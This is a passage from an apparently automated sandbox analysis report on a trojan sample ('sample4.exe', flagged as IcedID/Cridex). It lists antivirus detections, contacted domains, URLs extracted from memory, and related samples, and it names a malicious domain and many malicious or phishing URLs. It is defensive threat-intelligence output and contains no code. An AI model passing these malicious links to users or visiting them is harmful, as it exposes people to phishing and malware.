sample4.exe	3%	Metadefender		Browse
sample4.exe	79%	ReversingLabs	Win32.Worm.Cridex
sample4.exe	100%	Avira	TR/IcedId.ltfzr

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
0.2.sample4.exe.d0000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen		Download File

Domains

Source	Detection	Scanner	Label	Link
gegemony4you.top	6%	Virustotal		Browse
www.intel.ch	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
https://static.ads-twitter.com	0%	URL Reputation	safe
https://static.ads-twitter.com	0%	URL Reputation	safe
https://static.ads-twitter.com	0%	URL Reputation	safe
https://static.ads-twitter.com	0%	URL Reputation	safe
https://cdn.cms-twdigitalassets.com/content/dam/help-twitter/logos/card_wide_blue.png	0%	Avira URL Cloud	safe
https://cdn.cms-twdigitalassets.com	0%	Virustotal		Browse
https://cdn.cms-twdigitalassets.com	0%	Avira URL Cloud	safe
https://cdn.goglobalwithtwitter.com	0%	Avira URL Cloud	safe
https://feedback.digital-cloud-prem.medallia.com;	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
s.twitter.com	104.244.42.131	true	false		high
support.oracle.com	unknown	unknown	false		high
www.oracle.com	unknown	unknown	false		high
g.msn.com	unknown	unknown	false		high
help.twitter.com	unknown	unknown	false		high
www.intel.com	unknown	unknown	false		high
gegemony4you.top	unknown	unknown	true	6%, Virustotal, Browse	unknown
www.intel.ch	unknown	unknown	false	0%, Virustotal, Browse	unknown
corpredirect.intel.com	unknown	unknown	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://outlook.live.com/owa/	sample4.exe, 00000000.00000003.519277199.000000000152B000.00000004.00000001.sdmp	false		high
https://help.twitter.com/en/using-twitter#search-and-trends	sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	false		high
https://help.twitter.com/en/managing-your-account/notifications-on-mobile-devices	sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	false		high
https://help.twitter.com/fr	sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp, sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	false		high
https://about.twitter.com/en_us/safety.html	sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	false		high
https://developer.twitter.com/en/docs	sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	false		high
https://help.twitter.com/en/managing-your-account#login-and-password	sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	false		high
https://blog.twitter.com/	sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	false		high
https://help.twitter.com/fil	sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp	false		high
https://about.twitter.com/en_us/company.html	sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	false		high
https://help.twitter.com/nl	sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp, sample4.exe, 00000000.00000003.532297635.000000000153E000.00000004.00000001.sdmp	false		high
https://help.twitter.com/fa	sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp	false		high
https://twitter.com/AppleSupport	sample4.exe, 00000000.00000003.545079805.0000000003C0D000.00000004.00000001.sdmp	false		high
https://twitter.com/applesupport	sample4.exe, 00000000.00000003.545079805.0000000003C0D000.00000004.00000001.sdmp	false		high
https://resources.digital-cloud-prem.medallia.com	sample4.exe, 00000000.00000003.533332045.0000000001539000.00000004.00000001.sdmp	false		high
https://help.twitter.com/fi	sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp	false		high
https://templates.office.com/	sample4.exe, 00000000.00000003.519277199.000000000152B000.00000004.00000001.sdmp	false		high
https://twitter.com/i/csp_report;	sample4.exe, 00000000.00000003.533332045.0000000001539000.00000004.00000001.sdmp	false		high
https://business.twitter.com/en/advertising.html	sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	false		high
https://help.twitter.com/no	sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp	false		high
https://static.ads-twitter.com	sample4.exe, 00000000.00000003.533332045.0000000001539000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://help.twitter.com/en/rules-and-policies/twitter-rules	sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	false		high
https://cdn.cms-twdigitalassets.com/content/dam/help-twitter/logos/card_wide_blue.png	sample4.exe, 00000000.00000003.532297635.000000000153E000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://help.twitter.com/gu	sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp	false		high
https://api.twitter.com	sample4.exe, 00000000.00000003.533332045.0000000001539000.00000004.00000001.sdmp	false		high
https://help.twitter.com/en/using-twitter#adding-content-to-your-tweet	sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	false		high
https://blog.twitter.com/en_us/topics/company/2020/covid-19.html	sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp	false		high
https://twitter.com	sample4.exe, 00000000.00000003.533332045.0000000001539000.00000004.00000001.sdmp, sample4.exe, 00000000.00000003.532297635.000000000153E000.00000004.00000001.sdmp	false		high
https://www.twitterflightschool.com/sl/382652bc	sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	false		high
https://help.twitter.com/en/rules-and-policies#law-enforcement-guildelines	sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	false		high
https://login.microsoftonline.com/common/oauth2/authorize?response_mode=form_post	sample4.exe, 00000000.00000003.519277199.000000000152B000.00000004.00000001.sdmp	false		high
https://support.xbox.com/	sample4.exe, 00000000.00000003.519277199.000000000152B000.00000004.00000001.sdmp	false		high
https://help.twitter.com/en/managing-your-account	sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp, sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	false		high
https://help.twitter.com/en/using-twitter/mentions-and-replies	sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	false		high
https://help.twitter.com/en/rules	sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp	false		high
https://cdn.cms-twdigitalassets.com	sample4.exe, 00000000.00000003.533332045.0000000001539000.00000004.00000001.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.wikidata.org/wiki/Q65129345	sample4.exe, 00000000.00000003.545079805.0000000003C0D000.00000004.00000001.sdmp	false		high
https://help.twitter.com/en/a-safer-twitter	sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp	false		high
https://transparency.twitter.com/	sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	false		high
https://business.twitter.com/en/help.html	sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	false		high
https://help.twitter.com/en/twitter-guide	sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp, sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	false		high
https://cdn.goglobalwithtwitter.com	sample4.exe, 00000000.00000003.533332045.0000000001539000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://schema.org/VideoObject	sample4.exe, 00000000.00000003.519277199.000000000152B000.00000004.00000001.sdmp	false		high
https://help.twitter.com/en/using-twitter/tweeting-gifs-and-pictures	sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	false		high
https://help.twitter.com/en/how-you-can-control-your-privacy	sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp	false		high
https://help.twitter.com/en/using-twitter/advanced-twitter-mute-options	sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	false		high
https://careers.twitter.com/	sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	false		high
https://support.xbox.com	sample4.exe, 00000000.00000003.519277199.000000000152B000.00000004.00000001.sdmp	false		high
https://help.twitter.com/hu	sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp	false		high
https://blog.twitter.com/developer/	sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	false		high
https://www.microsoftstore.com/store/msusa/en_US/DisplayAddEditPaymentPage/	sample4.exe, 00000000.00000003.519277199.000000000152B000.00000004.00000001.sdmp	false		high
https://help.twitter.com	sample4.exe, 00000000.00000003.532297635.000000000153E000.00000004.00000001.sdmp	false		high
https://help.twitter.com/hr	sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp, sample4.exe, 00000000.00000003.532297635.000000000153E000.00000004.00000001.sdmp, sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	false		high
https://www.microsoftstore.com/store/msusa/en_US/wishlists?Wt.mc_id=wishlist_landingpage	sample4.exe, 00000000.00000003.519277199.000000000152B000.00000004.00000001.sdmp	false		high
https://www.microsoftstore.com/store/msusa/en_US/DisplayFindYourOrderPage/nextAction.DisplayAccountR	sample4.exe, 00000000.00000003.519277199.000000000152B000.00000004.00000001.sdmp	false		high
https://www.skype.com/en/	sample4.exe, 00000000.00000003.519277199.000000000152B000.00000004.00000001.sdmp	false		high
https://help.twitter.com/en/managing-your-account#verified-accounts	sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	false		high
https://media.twitter.com/	sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	false		high
https://www.microsoftstore.com/store/msusa/en_US/DisplayFindYourOrderPage/nextAction.DisplayAccountO	sample4.exe, 00000000.00000003.519277199.000000000152B000.00000004.00000001.sdmp	false		high
https://help.twitter.com/he	sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp	false		high
https://data.twitter.com/	sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	false		high
https://developer.twitter.com/en/community	sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	false		high
https://help.twitter.com/pl	sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp	false		high
https://schema.org	sample4.exe, 00000000.00000003.545079805.0000000003C0D000.00000004.00000001.sdmp	false		high
https://help.twitter.com/en/managing-your-account#notifications	sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	false		high
https://status.twitterstat.us/	sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	false		high
https://help.twitter.com/pt	sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp, sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	false		high
https://help.twitter.com/hi	sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp, sample4.exe, 00000000.00000003.532297635.000000000153E000.00000004.00000001.sdmp	false		high
https://www.onenote.com/	sample4.exe, 00000000.00000003.519277199.000000000152B000.00000004.00000001.sdmp	false		high
https://help.twitter.com/en/rules-and-policies#twitter-rules	sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	false		high
https://help.twitter.com/it	sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp, sample4.exe, 00000000.00000003.532297635.000000000153E000.00000004.00000001.sdmp	false		high
https://help.twitter.com/en/glossary	sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp, sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	false		high
https://help.twitter.com/ja	sample4.exe, 00000000.00000003.532297635.000000000153E000.00000004.00000001.sdmp, sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	false		high
https://cards-dev.twitter.com/validator	sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	false		high
http://ogp.me/ns#	sample4.exe, 00000000.00000003.532297635.000000000153E000.00000004.00000001.sdmp	false		high
https://help.twitter.com/ar	sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp, sample4.exe, 00000000.00000003.532297635.000000000153E000.00000004.00000001.sdmp	false		high
https://about.twitter.com/en_us/company/twitter-for-good.html	sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	false		high
https://privacy.twitter.com/	sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	false		high
https://help.twitter.com/en/using-twitter#tweets	sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	false		high
https://marketing.twitter.com/en/insights	sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	false		high
https://about.twitter.com/en_us/company/brand-resources.html	sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	false		high
https://help.twitter.com/id	sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp, sample4.exe, 00000000.00000003.532297635.000000000153E000.00000004.00000001.sdmp	false		high
http://schema.org/Organization	sample4.exe, 00000000.00000003.519277199.000000000152B000.00000004.00000001.sdmp	false		high
https://twitter.com/login?redirect_after_login=https://help.twitter.com/en	sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp	false		high
https://business.twitter.com/en/resources.html	sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	false		high
https://help.twitter.com/en/contact-us	sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp, sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	false		high
https://video.twimg.com/tweet_video/EAa_YvRU4AAH-IN.mp4	sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	false		high
https://business.twitter.com/	sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	false		high
https://help.twitter.com/en/safety-and-security/how-to-make-twitter-private-and-public	sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	false		high
https://help.twitter.com/bn	sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp	false		high
https://help.twitter.com/	sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	false		high
https://feedback.digital-cloud-prem.medallia.com;	sample4.exe, 00000000.00000003.533332045.0000000001539000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
https://twitter.com/privacy	sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	false		high
https://help.twitter.com/sk	sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp, sample4.exe, 00000000.00000003.532297635.000000000153E000.00000004.00000001.sdmp	false		high
https://templates.office.com/collection-family-activities	sample4.exe, 00000000.00000003.519277199.000000000152B000.00000004.00000001.sdmp	false		high
https://www.microsoftstore.com/store/msusa/en_US/DisplayFindYourOrderPage/nextAction.DisplayDownload	sample4.exe, 00000000.00000003.519277199.000000000152B000.00000004.00000001.sdmp	false		high
https://marketing.twitter.com/en/success-stories	sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	false		high
https://twitter.com/logout	sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp	false		high
https://help.twitter.com/en/using-twitter/direct-messages	sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	false		high
https://help.twitter.com/ro	sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.244.42.131	unknown	United States		13414	TWITTERUS	false

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	31.0.0 Red Diamond
Analysis ID:	339451
Start date:	14.01.2021
Start time:	04:01:56
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 38s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	sample4.bin (renamed file extension from bin to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	40
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@6/20@8/2
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 1.6% (good quality ratio 1.5%) Quality average: 78.6% Quality standard deviation: 26.7%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WerFault.exe, RuntimeBroker.exe, wermgr.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe Excluded IPs from analysis (whitelisted): 13.64.90.137, 52.147.198.201, 2.20.84.85, 20.190.129.19, 40.126.1.142, 20.190.129.2, 40.126.1.130, 40.126.1.145, 20.190.129.128, 20.190.129.160, 20.190.129.130, 51.11.168.160, 93.184.221.240, 92.122.213.194, 92.122.213.247, 20.54.26.129, 104.43.139.144, 51.104.139.180, 52.142.114.176, 40.88.32.150, 104.83.125.175, 104.83.83.83, 2.20.84.4, 2.21.61.56, 2.20.84.208, 2.17.181.200, 52.155.217.156 Excluded domains from analysis (whitelisted): intel11.edgekey.net, arc.msn.com.nsatc.net, intel11.cn.edgekey.net, support-china.apple-support.akadns.net, fs-wildcard.microsoft.com.edgekey.net, ev.support.microsoft.com.edgekey.net, skypedataprdcoleus15.cloudapp.net, prod-support.apple-support.akadns.net, support.oracle.com.edgekey.net, e3843.g.akamaiedge.net, login.live.com, audownload.windowsupdate.nsatc.net, hlb.apr-52dd2-0.edgecastdns.net, watson.telemetry.microsoft.com, au-bg-shim.trafficmanager.net, fs.microsoft.com, e2581.dscx.akamaiedge.net, ris-prod.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, www.tm.a.prd.aadg.akadns.net, skypedataprdcolcus16.cloudapp.net, ris.api.iris.microsoft.com, e2063.e9.akamaiedge.net, e11.dsca.akamaiedge.net, blobcollector.events.data.trafficmanager.net, www.tm.lg.prod.aadmsa.trafficmanager.net, intel19233.edgekey.net, e19233.dsca.akamaiedge.net, support.microsoft.com, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, wu.azureedge.net, g-msn-com-nsatc.trafficmanager.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, intel11.cn.edgekey.net.globalredir.akadns.net, support.apple.com, support.apple.com.edgekey.net, cs11.wpc.v0cdn.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, e870.x.akamaiedge.net, prod.fs.microsoft.com.akadns.net, wu.wpc.apr-52dd2.edgecastdns.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, wu.ec.azureedge.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, ds-www.oracle.com.edgekey.net, login.msa.msidentity.com, skypedataprdcoleus16.cloudapp.net Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
04:04:49	API Interceptor	9x Sleep call for process: sample4.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
104.244.42.131	https://cypressbayhockey.com/NO	Get hash	malicious	Browse
	details.html	Get hash	malicious	Browse
	details.html	Get hash	malicious	Browse
	https://numisconsult.com/blog/e47c4b8720db7445599988579a03c7c5	Get hash	malicious	Browse
	https://sosefinawinnifredsullivan8-5ce0e.gr8.com/	Get hash	malicious	Browse
	http://kikicustomwigs.com/inefficient.php	Get hash	malicious	Browse
	https://www.evernote.com/shard/s395/sh/e6cd3f32-356e-2b0f-29eb-532205cb0cdd/b301c5a7d8494fe2a6f2588862012fb5	Get hash	malicious	Browse
	https://doc.clickup.com/p/h/853bx-28/ee9d693560ec8e5	Get hash	malicious	Browse
	https://doc.clickup.com/p/h/84zph-7/c3996c24fc61b45	Get hash	malicious	Browse
	https://cts.indeed.com/v0?tk=1df9t5skc2g3980p&r=%68%74%74%70%73%3a%2f%2f%61%6e%61%6c%79%74%69%63%73%2e%74%77%69%74%74%65%72%2e%63%6f%6d%2f%64%61%61%2f%30%2f%64%61%61%5f%6f%70%74%6f%75%74%5f%61%63%74%69%6f%6e%73%3f%61%63%74%69%6f%6e%5f%69%64%3d%33%26%70%61%72%74%69%63%69%70%61%6e%74%5f%69%64%3d%37%31%36%26%72%64%3d%68%74%74%70%73%3a%2f%2f%66%72%61%31%2e%64%69%67%69%74%61%6c%6f%63%65%61%6e%73%70%61%63%65%73%2e%63%6f%6d%2f%73%32%32%2f%69%6e%64%65%78%2e%68%74%6d%6c%3f#matthias.kirsch@iti.org	Get hash	malicious	Browse
	WSGaRIW.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Mikey.116711.25037.dll	Get hash	malicious	Browse
	https://call.lifesizecloud.com/4478671	Get hash	malicious	Browse
	VSMecyU.dll	Get hash	malicious	Browse
	https://recovermy3-account.com/	Get hash	malicious	Browse
	https://recovermy3-account.com/	Get hash	malicious	Browse
	temp.dll	Get hash	malicious	Browse
	iuyala11.dll	Get hash	malicious	Browse
	temp.dll	Get hash	malicious	Browse
	temp.dll	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
s.twitter.com	http://search.hwatchtvnow.co	Get hash	malicious	Browse	104.244.42.131
	http://search.hshipmenttracker.co	Get hash	malicious	Browse	104.244.42.67
	https://t.yesware.com/tt/ae9851ab7b578dad1289f08bbf450624f7ae3a45/2ee42987f58d2f32bb36ff11a00dd921/2f4e7e35c28c3b7f4958904f5584a915/joom.ag/2VFC	Get hash	malicious	Browse	104.244.42.195
	https://joom.ag/3wFC	Get hash	malicious	Browse	104.244.42.3

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
TWITTERUS	http://message.mydopweb.com	Get hash	malicious	Browse	104.244.42.193
	http://www.secured-mailsharepoint.online/	Get hash	malicious	Browse	104.244.42.130
	https://www.ensonoelevate2021.com/event/8e8c2672-3b18-40b1-8efc-026ab72e6424/summary?environment=P2&5S%2CM3%2C8e8c2672-3b18-40b1-8efc-026ab72e6424=	Get hash	malicious	Browse	104.244.42.5
	https://cypressbayhockey.com/NO	Get hash	malicious	Browse	104.244.42.197
	details.html	Get hash	malicious	Browse	104.244.42.5
	details.html	Get hash	malicious	Browse	104.244.42.5
	https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/?utm_source=redcanary&utm_medium=email&utm_campaign=Blog%20Digest-2020-11-05T09:00:54.888-07:00&mkt_tok=eyJpIjoiWmpKbVlUTXpPRGMzTTJRMSIsInQiOiJtMm9iYWJESHd5VldFUTF2a05zeEdtVUdMNms3cHVcL01OcW9hYUlwOElYZFwvNkdvd0UzV0x2SDdNZVlIMWFTSG1jS28zM0JIamh3YXRvcmU0K2htaTJpTlFLbjNNaWswT2NxYlhXdElEZHVzMlFaclpoTUFzZk1ibTV0SGVwSCs2In0%3D	Get hash	malicious	Browse	104.244.42.133
	https://patrickphimr5.github.io/memoaideivozx/dsfriet.html?bbre=dxcfdgoiss	Get hash	malicious	Browse	104.244.42.65
	https://doc.clickup.com/p/h/2hm67-99/806f7673f7694a9	Get hash	malicious	Browse	104.244.42.3
	http://aypf.z2systems.com	Get hash	malicious	Browse	104.244.42.193
	https://create.piktochart.com/output/51658503-cfo-capabel	Get hash	malicious	Browse	104.244.42.2
	https://protect-us.mimecast.com/s/JFIWCVON1NCzq3ggtGInaq	Get hash	malicious	Browse	104.244.42.67
	http://g1security.co.tz	Get hash	malicious	Browse	104.244.42.129
	https://numisconsult.com/blog/e47c4b8720db7445599988579a03c7c5	Get hash	malicious	Browse	104.244.42.131
	http://search.hshipmenttracker.co	Get hash	malicious	Browse	104.244.42.197
	https://sosefinawinnifredsullivan8-5ce0e.gr8.com/	Get hash	malicious	Browse	104.244.42.131
	https://t.co/2QNQz4sNnh?amp=1	Get hash	malicious	Browse	104.244.42.69
	https://omsd-org.gq/?login=do&c=E,1,MTY2COfqGo5C-H4KALYqrUyXXPpd2evSCW3stb24PsdKe8xYdoYVhcjchdnzpUCr95AnX7X4QDVSQFpJtN_EpMZ8u2smwVQNUpYGz7Etn-l-NVb_st2_649iVg,,&typo=1	Get hash	malicious	Browse	104.244.42.197
	http://www.cqdx.ru	Get hash	malicious	Browse	104.244.42.193
	http://kikicustomwigs.com/inefficient.php	Get hash	malicious	Browse	104.244.42.5

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
ce5f3254611a8c095a3d821d44539877	WFLPGBTMZH.dll	Get hash	malicious	Browse	104.244.42.131
	Customer_Receivables_Aging_20210112_2663535345242424242.exe	Get hash	malicious	Browse	104.244.42.131
	Listings.exe	Get hash	malicious	Browse	104.244.42.131
	Transferencia,pdf.exe	Get hash	malicious	Browse	104.244.42.131
	Dhl Client Invoice.exe	Get hash	malicious	Browse	104.244.42.131
	64D5aP6jQz.exe	Get hash	malicious	Browse	104.244.42.131
	mscthef-Fichero-ES.msi	Get hash	malicious	Browse	104.244.42.131
	New inquiry CON 20-10630.exe	Get hash	malicious	Browse	104.244.42.131
	RLFGB8pdA6.exe	Get hash	malicious	Browse	104.244.42.131
	ORDER#9403.exe	Get hash	malicious	Browse	104.244.42.131
	CLIDSXX.exe	Get hash	malicious	Browse	104.244.42.131
	SecuriteInfo.com.Variant.Graftor.893032.186.exe	Get hash	malicious	Browse	104.244.42.131
	ptrb-ES-2999223.msi	Get hash	malicious	Browse	104.244.42.131
	T9tAui44l4.exe	Get hash	malicious	Browse	104.244.42.131
	E8Jkw96qFU.exe	Get hash	malicious	Browse	104.244.42.131
	SecuriteInfo.com.Trojan.DownLoader36.32796.17922.exe	Get hash	malicious	Browse	104.244.42.131
	y46XVvLaVc.exe	Get hash	malicious	Browse	104.244.42.131
	Softerra Adaxes 2011.3.exe	Get hash	malicious	Browse	104.244.42.131
	r0u.exe	Get hash	malicious	Browse	104.244.42.131
	r0u.exe	Get hash	malicious	Browse	104.244.42.131

Dropped Files

No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_sample4.exe_45365feab801c9585ad9627648598a0b3f59_b2de38ec_023208c1\Report.wer Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	12180
Entropy (8bit):	3.7757129548768527
Encrypted:	false
SSDEEP:	96:4nnLHJPBHQToA7Rb6tpXIQcQnc6rCcEhcw3r7+HbHg/PtuuzOOFLMbsWoxMfpNq9:gDJP/H56rQjzEfKXR/u7sxS274Itxpq
MD5:	F33A74C78B60DE4948ABD5FCA62C8C1D
SHA1:	6DAAA0FBCDF61CA7594A921A457A0CB428B16CD0
SHA-256:	7514782350B6350389B11D177F2F9CB6CABB95F4AEC9E8377EA9248A1722710B
SHA-512:	25E287B740FC747C4646DBC5CF1E80EE6384608864AD305711DAC723D099BCF78A4F2ADD7D4AEB6B1D99D01E3EA215275D2D75922885F171A827180B2F3E5258
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.5.5.0.9.9.4.6.1.3.3.4.6.1.7.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.f.5.0.1.7.1.e.-.c.7.a.3.-.4.6.b.a.-.b.c.8.5.-.2.2.a.8.f.7.6.b.b.f.2.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.0.1.7.c.2.6.2.-.0.1.5.3.-.4.5.2.c.-.b.7.6.6.-.5.8.7.5.9.a.0.7.8.d.5.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.s.a.m.p.l.e.4...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.a.r.r.a...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.8.3.4.-.0.0.0.1.-.0.0.1.7.-.c.7.f.b.-.d.e.2.b.6.d.e.a.d.6.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.8.a.f.e.e.8.1.a.7.5.1.5.4.c.b.b.d.8.a.0.f.f.7.c.2.f.6.3.6.9.d.0.0.0.0.0.9.0.4.!.0.0.0.0.d.f.6.0.7.3.6.7.a.8.8.b.5.6.1.0.a.2.2.4.9.0.9.e.f.b.8.d.e.b.e.b.0.d.9.0.f.4.8.7.!.s.a.m.p.l.e.4...e.x.e.....T.a.r.g.e